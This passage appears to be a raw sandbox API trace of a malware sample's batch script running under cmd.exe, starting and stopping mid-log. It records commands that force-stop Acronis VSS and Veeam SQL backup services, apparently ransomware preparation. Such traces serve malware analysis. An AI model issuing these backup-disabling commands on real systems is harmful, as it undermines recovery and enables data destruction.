(lpRootPathName="C:\\") returned 0x3 [0218.054] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0218.055] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0218.055] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0218.055] GetLastError () returned 0x2 [0218.056] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0218.056] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0218.056] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0218.057] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0218.057] SetErrorMode (uMode=0x0) returned 0x1 [0218.057] GetProcessHeap () returned 0x3e0000 [0218.057] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0218.057] GetProcessHeap () returned 0x3e0000 [0218.057] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0218.057] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0218.057] GetProcessHeap () returned 0x3e0000 [0218.057] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0218.057] GetProcessHeap () returned 0x3e0000 [0218.057] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0218.058] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0218.058] GetProcessHeap () returned 0x3e0000 [0218.058] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0218.058] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0218.058] GetProcessHeap () returned 0x3e0000 [0218.058] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0218.058] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0218.058] GetProcessHeap () returned 0x3e0000 [0218.058] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0218.058] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0218.059] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0218.059] GetLastError () returned 0x2 [0218.059] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0218.060] GetLastError () returned 0x2 [0218.060] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0218.060] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0218.061] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0218.061] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0218.061] GetLastError () returned 0x2 [0218.061] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0218.062] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0218.062] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0218.062] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0218.062] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0218.062] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0218.063] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0218.063] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop ΓÇ£Acronis VSS ProviderΓÇ¥ /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop ΓÇ£Acronis VSS ProviderΓÇ¥ /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop ΓÇ£Acronis VSS ProviderΓÇ¥ /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0x204, dwThreadId=0x5a4)) returned 1 [0218.067] CloseHandle (hObject=0x78) returned 1 [0218.067] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0218.067] GetProcessHeap () returned 0x3e0000 [0218.067] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0218.067] GetEnvironmentStringsW () returned 0x3f8408* [0218.067] GetProcessHeap () returned 0x3e0000 [0218.067] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0218.067] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0218.067] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0218.207] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x1) returned 1 [0218.207] CloseHandle (hObject=0x74) returned 1 [0218.207] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000001") returned 8 [0218.207] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0218.207] GetProcessHeap () returned 0x3e0000 [0218.207] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0218.207] GetEnvironmentStringsW () returned 0x3f8408* [0218.207] GetProcessHeap () returned 0x3e0000 [0218.207] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0218.207] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0218.207] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0218.208] GetProcessHeap () returned 0x3e0000 [0218.208] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0218.208] GetEnvironmentStringsW () returned 0x3f8408* [0218.208] GetProcessHeap () returned 0x3e0000 [0218.208] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0218.208] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0218.208] GetProcessHeap () returned 0x3e0000 [0218.208] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0218.208] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0218.208] _get_osfhandle (_FileHandle=1) returned 0x264 [0218.208] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0218.208] _get_osfhandle (_FileHandle=1) returned 0x264 [0218.208] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0218.208] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0218.208] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0218.209] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0218.209] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0218.209] SetConsoleInputExeNameW () returned 0x1 [0218.209] GetConsoleOutputCP () returned 0x1b5 [0218.209] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0218.209] SetThreadUILanguage (LangId=0x0) returned 0x409 [0218.209] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0218.209] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0218.209] _get_osfhandle (_FileHandle=3) returned 0x74 [0218.209] SetFilePointer (in: hFile=0x74, lDistanceToMove=6076, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x17bc [0218.209] GetProcessHeap () returned 0x3e0000 [0218.209] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0218.209] GetProcessHeap () returned 0x3e0000 [0218.209] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0218.210] GetProcessHeap () returned 0x3e0000 [0218.210] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0218.210] GetProcessHeap () returned 0x3e0000 [0218.210] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0218.210] GetProcessHeap () returned 0x3e0000 [0218.210] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0218.210] GetProcessHeap () returned 0x3e0000 [0218.210] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0218.210] GetProcessHeap () returned 0x3e0000 [0218.210] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0218.210] GetProcessHeap () returned 0x3e0000 [0218.210] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0218.210] GetProcessHeap () returned 0x3e0000 [0218.210] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0218.210] GetProcessHeap () returned 0x3e0000 [0218.210] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0218.210] GetProcessHeap () returned 0x3e0000 [0218.210] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0218.210] GetProcessHeap () returned 0x3e0000 [0218.210] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0218.210] GetProcessHeap () returned 0x3e0000 [0218.210] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0218.210] _get_osfhandle (_FileHandle=3) returned 0x74 [0218.210] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x17bc [0218.210] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x105, lpOverlapped=0x0) returned 1 [0218.210] SetFilePointer (in: hFile=0x74, lDistanceToMove=6110, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x17de [0218.210] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=34, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop MSSQL$VEEAMSQL2008R2 /y\r\n¥ /y\r\n /y\r\n\r\n¥ /y\r\nures\r\nnded\r\n") returned 34 [0218.211] _get_osfhandle (_FileHandle=3) returned 0x74 [0218.211] GetFileType (hFile=0x74) returned 0x1 [0218.211] _get_osfhandle (_FileHandle=3) returned 0x74 [0218.211] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x17de [0218.211] GetProcessHeap () returned 0x3e0000 [0218.211] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3ffad8 [0218.211] GetProcessHeap () returned 0x3e0000 [0218.211] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ffad8 | out: hHeap=0x3e0000) returned 1 [0218.214] _tell (_FileHandle=3) returned 6110 [0218.214] _close (_FileHandle=3) returned 0 [0218.214] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0218.215] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0218.215] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0218.215] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0218.215] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0218.215] _wcsicmp (_String1="net", _String2="CD") returned 11 [0218.215] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0218.215] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0218.215] _wcsicmp (_String1="net", _String2="REN") returned -4 [0218.215] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0218.215] _wcsicmp (_String1="net", _String2="SET") returned -5 [0218.215] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0218.215] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0218.215] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0218.215] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0218.215] _wcsicmp (_String1="net", _String2="MD") returned 1 [0218.215] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0218.215] _wcsicmp (_String1="net", _String2="RD") returned -4 [0218.215] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0218.215] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0218.215] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0218.215] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0218.215] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0218.215] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0218.215] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0218.215] _wcsicmp (_String1="net", _String2="VER") returned -8 [0218.215] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0218.215] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0218.215] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0218.215] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0218.215] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0218.215] _wcsicmp (_String1="net", _String2="START") returned -5 [0218.215] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0218.215] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0218.215] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0218.215] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0218.215] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0218.216] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0218.216] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0218.216] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0218.216] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0218.216] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0218.216] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0218.216] SetErrorMode (uMode=0x0) returned 0x1 [0218.216] GetProcessHeap () returned 0x3e0000 [0218.216] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0218.216] GetProcessHeap () returned 0x3e0000 [0218.216] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0218.217] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0218.217] GetProcessHeap () returned 0x3e0000 [0218.217] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0218.217] GetProcessHeap () returned 0x3e0000 [0218.217] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0218.217] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0218.217] GetProcessHeap () returned 0x3e0000 [0218.217] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0218.217] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0218.217] GetProcessHeap () returned 0x3e0000 [0218.217] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0218.218] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0218.218] GetProcessHeap () returned 0x3e0000 [0218.218] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0218.218] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0218.218] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0218.219] GetLastError () returned 0x2 [0218.219] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0218.219] GetLastError () returned 0x2 [0218.219] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0218.220] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0218.220] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0218.220] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0218.220] GetLastError () returned 0x2 [0218.221] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0218.221] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0218.221] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0218.222] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0218.222] SetErrorMode (uMode=0x0) returned 0x1 [0218.222] GetProcessHeap () returned 0x3e0000 [0218.222] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0218.222] GetProcessHeap () returned 0x3e0000 [0218.222] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0218.223] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0218.223] GetProcessHeap () returned 0x3e0000 [0218.223] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0218.223] GetProcessHeap () returned 0x3e0000 [0218.223] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0218.223] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0218.223] GetProcessHeap () returned 0x3e0000 [0218.223] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0218.223] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0218.223] GetProcessHeap () returned 0x3e0000 [0218.223] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0218.224] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0218.224] GetProcessHeap () returned 0x3e0000 [0218.224] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0218.224] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0218.224] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0218.225] GetLastError () returned 0x2 [0218.225] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0218.225] GetLastError () returned 0x2 [0218.225] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0218.226] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0218.226] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0218.226] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0218.226] GetLastError () returned 0x2 [0218.227] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0218.227] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0218.227] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0218.227] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0218.228] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0218.228] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0218.228] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0218.228] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop MSSQL$VEEAMSQL2008R2 /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop MSSQL$VEEAMSQL2008R2 /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop MSSQL$VEEAMSQL2008R2 /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0x6e4, dwThreadId=0x734)) returned 1 [0218.232] CloseHandle (hObject=0x74) returned 1 [0218.232] SetEnvironmentVariableW (lpName="COPYCMD", 